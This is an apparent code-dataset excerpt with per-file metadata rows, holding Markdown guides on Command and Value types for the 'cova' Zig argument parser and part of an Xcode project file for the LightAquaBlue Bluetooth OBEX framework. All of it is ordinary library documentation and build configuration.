| 2,004 | localepocpyutils | h | en | c | code | {"qsc_code_num_words": 289, "qsc_code_num_chars": 2004.0, "qsc_code_mean_word_length": 5.08304498, "qsc_code_frac_words_unique": 0.53979239, "qsc_code_frac_chars_top_2grams": 0.0599047, "qsc_code_frac_chars_top_3grams": 0.02042206, "qsc_code_frac_chars_top_4grams": 0.0, "qsc_code_frac_chars_dupe_5grams": 0.0, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00473653, "qsc_code_frac_chars_whitespace": 0.15718563, "qsc_code_size_file_byte": 2004.0, "qsc_code_num_lines": 64.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 31.3125, "qsc_code_frac_chars_alphabet": 0.86500888, "qsc_code_frac_chars_comments": 0.73602794, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0952381, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.38095238, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
00JCIV00/cova | docs/guides/arg_types/command.md | # Command
A Command is a container Argument Type for sub-Commands, Options, and Values. It can contain any mix of those Argument Types or none at all if it's to be used as a standalone Command (i.e. `covademo help`).
## Configuring a Command Type
Before a Command is used within a project, a Command Type should be configured. A Command Type is used to set common-to-all properties of each Command created from it. Typically, this will cover the main Command of a project and all of its sub-Commands. The easiest way to configure a Command Type is to simply use `cova.Command.Base`() which is the default Command Type. To configure a custom Command Type, use `cova.Command.Custom`() with a `cova.Command.Config` (`config`) which provides several customizations to set up the Option Type, Value Type, Help/Usage messages, Mandatory sub-Commands/Values, and max sub Arguments. Once configured, the Command Type has access to all of the functions under `cova.Command.Custom` and any Command created from the Command Type similarly has access to all of the corresponding methods.
## Setting up a Command
Commands are meant to be set up in Comptime and used in Runtime. This means that the Command and all of its subordinate Arguments (Commands, Options, and Values) should be Comptime-known, allowing for proper Validation which provides direct feedback to the library user during compilation instead of preventable errors to the end user during Runtime.
There are two ways to set up a Command. The first is to use Zig's standard syntax for creating a struct instance and fill in the fields of the previously configured Command Type. Alternatively, if the project has a Struct, Union, or Function Type that can be represented as a Command, the `cova.Command.Custom.from`() function can be used to create the Command.
After they're set up, Commands should be Validated and Allocated to the heap for Runtime use. This is accomplished using `cova.Command.Custom.init`(). At this point, the data within the Command should be treated as read-only by the libary user, so the library is set up to handle initialized Commands as constants (`const`).
## Additional Info
For easy analysis, parsed Commands can be converted to valid Structs or Unions using the `cova.Command.Custom.to`() function, or called as Functions using the `cova.Command.Custom.callAs`() function. Other functions for analysis include `cova.Command.Custom.checkCmd`() and `cova.Command.Custom.matchCmd`() to access specific sub-Commands, creating a String HashMap<Name, Value/Option> for Options or Values using the respective `cova.Command.Custom.getOpts`() or `cova.Command.Custom.getVals`() methods, and using the `cova.Command.Custom.checkFlag`() method to simply check if a sub-Argument was set. Usage and Help statements for a Command can also be generated using the `cova.Command.Custom.usage`() and `cova.Command.Custom.help`() methods respectively.
## Example:
```zig
...
pub const cova = @import("cova");
pub const CommandT = cova.Command.Custom(.{ global_help_prefix = "CovaDemo" });
// Comptime Setup
const setup_cmd: CommandT = .{
.name = "covademo",
.description = "A demo of the Cova command line argument parser.",
.sub_cmds = &.{
.{
.name = "sub_cmd",
.description = "This is a Sub Command within the 'covademo' main Command.",
},
command_from_elsewhere,
CommandT.from(SomeValidStructType),
}
.opts = { ... },
.vals = { ... },
};
pub fn main() !void {
...
// Runtime Use
const main_cmd = try setup_cmd.init(alloc);
defer main_cmd.deinit();
cova.parseArgs(..., &main_cmd, ...);
utils.displayCmdInfo(CustomCommand, &main_cmd, alloc, stdout);
}
```
| 3,737 | command | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.00374632, "qsc_doc_frac_words_redpajama_stop": 0.29860229, "qsc_doc_num_sentences": 85.0, "qsc_doc_num_words": 571, "qsc_doc_num_chars": 3737.0, "qsc_doc_num_lines": 48.0, "qsc_doc_mean_word_length": 4.84588441, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.04166667, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.35901926, "qsc_doc_entropy_unigram": 4.67212115, "qsc_doc_frac_words_all_caps": 0.00381194, "qsc_doc_frac_lines_dupe_lines": 0.1025641, "qsc_doc_frac_chars_dupe_lines": 0.00223277, "qsc_doc_frac_chars_top_2grams": 0.06758222, "qsc_doc_frac_chars_top_3grams": 0.08601373, "qsc_doc_frac_chars_top_4grams": 0.03614022, "qsc_doc_frac_chars_dupe_5grams": 0.04987351, "qsc_doc_frac_chars_dupe_6grams": 0.01373329, "qsc_doc_frac_chars_dupe_7grams": 0.0, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 23.92, "qsc_doc_frac_chars_hyperlink_html_tag": 0.00535189, "qsc_doc_frac_chars_alphabet": 0.89431157, "qsc_doc_frac_chars_digital": 0.0, "qsc_doc_frac_chars_whitespace": 0.17206315, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
00JCIV00/cova | docs/guides/arg_types/value.md | # Value
A Value (also known as a Positional Argument) is an Argument Type that is expected in a specific order and should be interpreted as a specific Type. The full list of available Types can be seen in `cova.Value.Generic` and customized via `cova.Value.Custom`, but the basics are Boolean, String (`[]const u8`), Integer (`u/i##`), or Float (`f##`). A single Value can store individual or multiple instances of one of these Types. Values are also used to hold and represent the data held by an Option via the `cova.Option.Custom.val` field. As such, anything that applies to Values is also "inherited" by Options.
## Understanding Typed vs Generic vs Custom Values
The base data for a Value is held within a `cova.Value.Typed` instance. However, to provide flexibility for the cova library and library users, the `cova.Value.Generic` union will wrap any `cova.Value.Typed` and provide access to several common-to-all methods. This allows Values to be handled in a generic manner in cases such as function parameters, function returns, collections, etc. However, if the actual parsed data of the Value is needed, the appropriate `cova.Value.Generic` field must be used. Field names for this union are simply the Value's Child Type name with the exception of `[]const u8` which is the `.string` field.
Finally, the `cova.Value.Custom` sets up and wraps `cova.Value.Generic` union. This Type is used similary to `cova.Command.Custom` and `cova.Option.Custom`. It allows common-to-all properties of Values within a project to be configured and provides easy methods for accessing properties of individual Values.
## Configuring a Value Type
This process mirrors that of Option Types nearly one-for-one. A `cova.Value.Config` can be configured directly within the Command Config via the `cova.Command.Config.val_config` field. If not configured, the defaults will be used. A major feature of the Custom Value Type and Generic Value Union combination is the ability to set custom types for the Generic Value Union. This is accomplished via the `cova.Value.Config`, by setting the `cova.Value.Config.custom_types` field.
### Adding Custom Child Types
Adding custom Child Types allows Cova to parse argument tokens into virtually any Type. This is accomplished by first adding the custom Child Types to the `Value.Config.custom_types` field, then (non-primitive Types) specifying parsing functions for these Types via `Value.Config.child_type_parse_fns` as seen here:
```zig
const CommandT = cova.Command.Custom(cova.Command.Config{
.global_help_prefix = "Example",
.val_config = .{
.custom_types = &.{
std.net.Address,
std.fs.File,
},
.child_type_parse_fns = &.{
.{
.ChildT = std.net.Address,
.parse_fn = struct{
pub fn parseIP(addr: []const u8, _: std.mem.Allocator) !std.net.Address {
var iter = std.mem.splitScalar(u8, addr, ':');
return net.Address.parseIp(
iter.first(),
try std.fmt.parseInt(u16, iter.next() orelse "-", 10),
) catch |err| {
std.log.err("The provided IP address '{s}' is invalid.", .{ addr });
return err;
};
}
}.parseIP,
},
.{
.ChildT = std.fs.File,
.parse_fn = struct{
pub fn parseFile(path: []const u8, _: std.mem.Allocator) !std.fs.File {
var cwd = std.fs.cwd();
return cwd.openFile(path, .{ .lock = .shared }) catch |err| {
std.log.err("The provided path to the File '{s}' is invalid.", .{ path });
return err;
};
}
}.parseFile,
},
},
}
});
```
## Setting up a Value
Similar to Options, Values are designed to be set up within a Command. Specifically, within a Command's `cova.Command.Custom.vals` field. This can be done using a combination of Zig's Union and Anonymous Struct (Tuple) syntax or by using the `cova.Value.ofType`() function.
Values can be given a Default value using the `cova.Value.Typed.default_val` field as well as an alternate Parsing Function and a Validation Function using the `cova.Value.Typed.parse_fn` and `cova.Value.Typed.valid_fn` fields respectively. An example of how to create an anonymous function for these fields can be seen below. There are also common functions and function builders available within both `cova.Value.ParsingFns` and `cova.Value.ValidationFns`.
These functions allow for simple and powerful additions to how Values are parsed. For instance, the `true` value for Booleans can be expanded to include more words (i.e. `true = "yes", "y", "on"`), a numeric value can be limited to a certain range of numbers (i.e. `arg > 10 and arg <= 1000`), or an arbitrary string can be converted to something else (i.e. `"eight" = 8`). Moreover, since these functions all follow normal Zig syntax, they can be combined into higher level functions for more complex parsing and validation. Finally, the custom parsing functions in particular allow Custom Types to be parsed directly from a given argument token. For example, converting a given filepath into a `std.fs.File`.
Example:
```zig
// Within a Command
...
.vals = &.{
Value.ofType([]const u8, .{
.name = "str_val",
.description = "A string value for the command.",
}),
// Using Zig's union creation syntax
.{ .generic = .{ .u128, .{
.name = "cmd_u128",
.description = "A u128 value for the command.",
// Default Value
.default_val = 654321,
// Validation Function
.valid_fn = struct{ fn valFn(val: u128) bool { return val > 123 and val < 987654321; } }.valFn,
} } },
}
```
## Additional Info
Values will be parsed to their corresponding types which can then be retrieved using `get()` for Inidivual Values or `getAll()` for Multi-Values.
| 6,191 | value | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.00775319, "qsc_doc_frac_words_redpajama_stop": 0.256852, "qsc_doc_num_sentences": 161.0, "qsc_doc_num_words": 876, "qsc_doc_num_chars": 6191.0, "qsc_doc_num_lines": 84.0, "qsc_doc_mean_word_length": 4.64269406, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.01190476, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.32305936, "qsc_doc_entropy_unigram": 5.0457085, "qsc_doc_frac_words_all_caps": 0.0054816, "qsc_doc_frac_lines_dupe_lines": 0.26666667, "qsc_doc_frac_chars_dupe_lines": 0.01820884, "qsc_doc_frac_chars_top_2grams": 0.03761987, "qsc_doc_frac_chars_top_3grams": 0.02065404, "qsc_doc_frac_chars_top_4grams": 0.01253996, "qsc_doc_frac_chars_dupe_5grams": 0.05901156, "qsc_doc_frac_chars_dupe_6grams": 0.02606344, "qsc_doc_frac_chars_dupe_7grams": 0.01376936, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 22.81538462, "qsc_doc_frac_chars_hyperlink_html_tag": 0.0, "qsc_doc_frac_chars_alphabet": 0.86619263, "qsc_doc_frac_chars_digital": 0.01012713, "qsc_doc_frac_chars_whitespace": 0.25036343, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/LightAquaBlue.xcodeproj/project.pbxproj | // !$*UTF8*$!
{
archiveVersion = 1;
classes = {
};
objectVersion = 46;
objects = {
/* Begin PBXBuildFile section */
6692821A0E297230008CB8B0 /* BridgeSupport in Resources */ = {isa = PBXBuildFile; fileRef = 669282170E297230008CB8B0 /* BridgeSupport */; };
8100016A0D09536000FA9985 /* BBStreamingOutputStream.h in Headers */ = {isa = PBXBuildFile; fileRef = 810001680D09536000FA9985 /* BBStreamingOutputStream.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100016B0D09536000FA9985 /* BBStreamingOutputStream.m in Sources */ = {isa = PBXBuildFile; fileRef = 810001690D09536000FA9985 /* BBStreamingOutputStream.m */; };
8100FE030D056D0100FA9985 /* BBBluetoothOBEXClient.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDEB0D056D0000FA9985 /* BBBluetoothOBEXClient.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE040D056D0100FA9985 /* BBBluetoothOBEXClient.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDEC0D056D0000FA9985 /* BBBluetoothOBEXClient.m */; };
8100FE050D056D0100FA9985 /* BBBluetoothOBEXServer.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDED0D056D0000FA9985 /* BBBluetoothOBEXServer.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE060D056D0100FA9985 /* BBBluetoothOBEXServer.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDEE0D056D0000FA9985 /* BBBluetoothOBEXServer.m */; };
8100FE070D056D0100FA9985 /* BBStreamingInputStream.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDEF0D056D0000FA9985 /* BBStreamingInputStream.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE080D056D0100FA9985 /* BBStreamingInputStream.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDF00D056D0000FA9985 /* BBStreamingInputStream.m */; };
8100FE090D056D0100FA9985 /* BBLocalDevice.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDF10D056D0000FA9985 /* BBLocalDevice.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE0A0D056D0100FA9985 /* BBLocalDevice.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDF20D056D0000FA9985 /* BBLocalDevice.m */; };
8100FE0B0D056D0100FA9985 /* BBMutableOBEXHeaderSet.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDF30D056D0000FA9985 /* BBMutableOBEXHeaderSet.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE0C0D056D0100FA9985 /* BBMutableOBEXHeaderSet.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDF40D056D0000FA9985 /* BBMutableOBEXHeaderSet.m */; };
8100FE0D0D056D0100FA9985 /* BBOBEXHeaderSet.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDF50D056D0000FA9985 /* BBOBEXHeaderSet.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE0E0D056D0100FA9985 /* BBOBEXHeaderSet.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDF60D056D0000FA9985 /* BBOBEXHeaderSet.m */; };
8100FE0F0D056D0100FA9985 /* BBOBEXRequest.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDF70D056D0100FA9985 /* BBOBEXRequest.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE100D056D0100FA9985 /* BBOBEXRequest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDF80D056D0100FA9985 /* BBOBEXRequest.m */; };
8100FE110D056D0100FA9985 /* BBOBEXRequestHandler.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDF90D056D0100FA9985 /* BBOBEXRequestHandler.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE120D056D0100FA9985 /* BBOBEXRequestHandler.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDFA0D056D0100FA9985 /* BBOBEXRequestHandler.m */; };
8100FE150D056D0100FA9985 /* BBServiceAdvertiser.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDFD0D056D0100FA9985 /* BBServiceAdvertiser.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE160D056D0100FA9985 /* BBServiceAdvertiser.m in Sources */ = {isa = PBXBuildFile; fileRef = 8100FDFE0D056D0100FA9985 /* BBServiceAdvertiser.m */; };
8100FE170D056D0100FA9985 /* LightAquaBlue.h in Headers */ = {isa = PBXBuildFile; fileRef = 8100FDFF0D056D0100FA9985 /* LightAquaBlue.h */; settings = {ATTRIBUTES = (Public, ); }; };
8100FE180D056D0100FA9985 /* OBEXFileTransferDictionary.plist in Resources */ = {isa = PBXBuildFile; fileRef = 8100FE000D056D0100FA9985 /* OBEXFileTransferDictionary.plist */; };
8100FE190D056D0100FA9985 /* OBEXObjectPushDictionary.plist in Resources */ = {isa = PBXBuildFile; fileRef = 8100FE010D056D0100FA9985 /* OBEXObjectPushDictionary.plist */; };
8100FE1A0D056D0100FA9985 /* SerialPortDictionary.plist in Resources */ = {isa = PBXBuildFile; fileRef = 8100FE020D056D0100FA9985 /* SerialPortDictionary.plist */; };
8100FE1C0D056D4300FA9985 /* IOBluetooth.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 8100FE1B0D056D4300FA9985 /* IOBluetooth.framework */; };
817D21A30D3D7FA500469B5D /* BBBluetoothChannelDelegate.h in Headers */ = {isa = PBXBuildFile; fileRef = 817D21A10D3D7FA500469B5D /* BBBluetoothChannelDelegate.h */; settings = {ATTRIBUTES = (Public, ); }; };
817D21A40D3D7FA500469B5D /* BBBluetoothChannelDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 817D21A20D3D7FA500469B5D /* BBBluetoothChannelDelegate.m */; };
817D239D0D40313600469B5D /* BBOBEXResponse.h in Headers */ = {isa = PBXBuildFile; fileRef = 817D239B0D40313600469B5D /* BBOBEXResponse.h */; settings = {ATTRIBUTES = (Public, ); }; };
817D239E0D40313600469B5D /* BBOBEXResponse.m in Sources */ = {isa = PBXBuildFile; fileRef = 817D239C0D40313600469B5D /* BBOBEXResponse.m */; };
8DC2EF530486A6940098B216 /* InfoPlist.strings in Resources */ = {isa = PBXBuildFile; fileRef = 089C1666FE841158C02AAC07 /* InfoPlist.strings */; };
8DC2EF570486A6940098B216 /* Cocoa.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 1058C7B1FEA5585E11CA2CBB /* Cocoa.framework */; };
/* End PBXBuildFile section */
/* Begin PBXFileReference section */
0867D69BFE84028FC02AAC07 /* Foundation.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = Foundation.framework; path = /System/Library/Frameworks/Foundation.framework; sourceTree = "<absolute>"; };
0867D6A5FE840307C02AAC07 /* AppKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = AppKit.framework; path = /System/Library/Frameworks/AppKit.framework; sourceTree = "<absolute>"; };
089C1667FE841158C02AAC07 /* English */ = {isa = PBXFileReference; fileEncoding = 10; lastKnownFileType = text.plist.strings; name = English; path = English.lproj/InfoPlist.strings; sourceTree = "<group>"; };
1058C7B1FEA5585E11CA2CBB /* Cocoa.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = Cocoa.framework; path = /System/Library/Frameworks/Cocoa.framework; sourceTree = "<absolute>"; };
32DBCF5E0370ADEE00C91783 /* LightAquaBlue_Prefix.pch */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = LightAquaBlue_Prefix.pch; sourceTree = "<group>"; };
669282170E297230008CB8B0 /* BridgeSupport */ = {isa = PBXFileReference; lastKnownFileType = folder; path = BridgeSupport; sourceTree = "<group>"; };
810001680D09536000FA9985 /* BBStreamingOutputStream.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = BBStreamingOutputStream.h; sourceTree = "<group>"; };
810001690D09536000FA9985 /* BBStreamingOutputStream.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = BBStreamingOutputStream.m; sourceTree = "<group>"; };
8100FDEB0D056D0000FA9985 /* BBBluetoothOBEXClient.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBBluetoothOBEXClient.h; sourceTree = "<group>"; };
8100FDEC0D056D0000FA9985 /* BBBluetoothOBEXClient.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBBluetoothOBEXClient.m; sourceTree = "<group>"; };
8100FDED0D056D0000FA9985 /* BBBluetoothOBEXServer.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBBluetoothOBEXServer.h; sourceTree = "<group>"; };
8100FDEE0D056D0000FA9985 /* BBBluetoothOBEXServer.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBBluetoothOBEXServer.m; sourceTree = "<group>"; };
8100FDEF0D056D0000FA9985 /* BBStreamingInputStream.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBStreamingInputStream.h; sourceTree = "<group>"; };
8100FDF00D056D0000FA9985 /* BBStreamingInputStream.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBStreamingInputStream.m; sourceTree = "<group>"; };
8100FDF10D056D0000FA9985 /* BBLocalDevice.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBLocalDevice.h; sourceTree = "<group>"; };
8100FDF20D056D0000FA9985 /* BBLocalDevice.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBLocalDevice.m; sourceTree = "<group>"; };
8100FDF30D056D0000FA9985 /* BBMutableOBEXHeaderSet.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBMutableOBEXHeaderSet.h; sourceTree = "<group>"; };
8100FDF40D056D0000FA9985 /* BBMutableOBEXHeaderSet.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBMutableOBEXHeaderSet.m; sourceTree = "<group>"; };
8100FDF50D056D0000FA9985 /* BBOBEXHeaderSet.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBOBEXHeaderSet.h; sourceTree = "<group>"; };
8100FDF60D056D0000FA9985 /* BBOBEXHeaderSet.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBOBEXHeaderSet.m; sourceTree = "<group>"; };
8100FDF70D056D0100FA9985 /* BBOBEXRequest.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBOBEXRequest.h; sourceTree = "<group>"; };
8100FDF80D056D0100FA9985 /* BBOBEXRequest.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBOBEXRequest.m; sourceTree = "<group>"; };
8100FDF90D056D0100FA9985 /* BBOBEXRequestHandler.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBOBEXRequestHandler.h; sourceTree = "<group>"; };
8100FDFA0D056D0100FA9985 /* BBOBEXRequestHandler.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBOBEXRequestHandler.m; sourceTree = "<group>"; };
8100FDFD0D056D0100FA9985 /* BBServiceAdvertiser.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = BBServiceAdvertiser.h; sourceTree = "<group>"; };
8100FDFE0D056D0100FA9985 /* BBServiceAdvertiser.m */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.objc; path = BBServiceAdvertiser.m; sourceTree = "<group>"; };
8100FDFF0D056D0100FA9985 /* LightAquaBlue.h */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = sourcecode.c.h; path = LightAquaBlue.h; sourceTree = "<group>"; };
8100FE000D056D0100FA9985 /* OBEXFileTransferDictionary.plist */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = text.plist.xml; path = OBEXFileTransferDictionary.plist; sourceTree = "<group>"; };
8100FE010D056D0100FA9985 /* OBEXObjectPushDictionary.plist */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = text.plist.xml; path = OBEXObjectPushDictionary.plist; sourceTree = "<group>"; };
8100FE020D056D0100FA9985 /* SerialPortDictionary.plist */ = {isa = PBXFileReference; fileEncoding = 30; lastKnownFileType = text.plist.xml; path = SerialPortDictionary.plist; sourceTree = "<group>"; };
8100FE1B0D056D4300FA9985 /* IOBluetooth.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOBluetooth.framework; path = /System/Library/Frameworks/IOBluetooth.framework; sourceTree = "<absolute>"; };
817D21A10D3D7FA500469B5D /* BBBluetoothChannelDelegate.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = BBBluetoothChannelDelegate.h; sourceTree = "<group>"; };
817D21A20D3D7FA500469B5D /* BBBluetoothChannelDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = BBBluetoothChannelDelegate.m; sourceTree = "<group>"; };
817D239B0D40313600469B5D /* BBOBEXResponse.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = BBOBEXResponse.h; sourceTree = "<group>"; };
817D239C0D40313600469B5D /* BBOBEXResponse.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = BBOBEXResponse.m; sourceTree = "<group>"; };
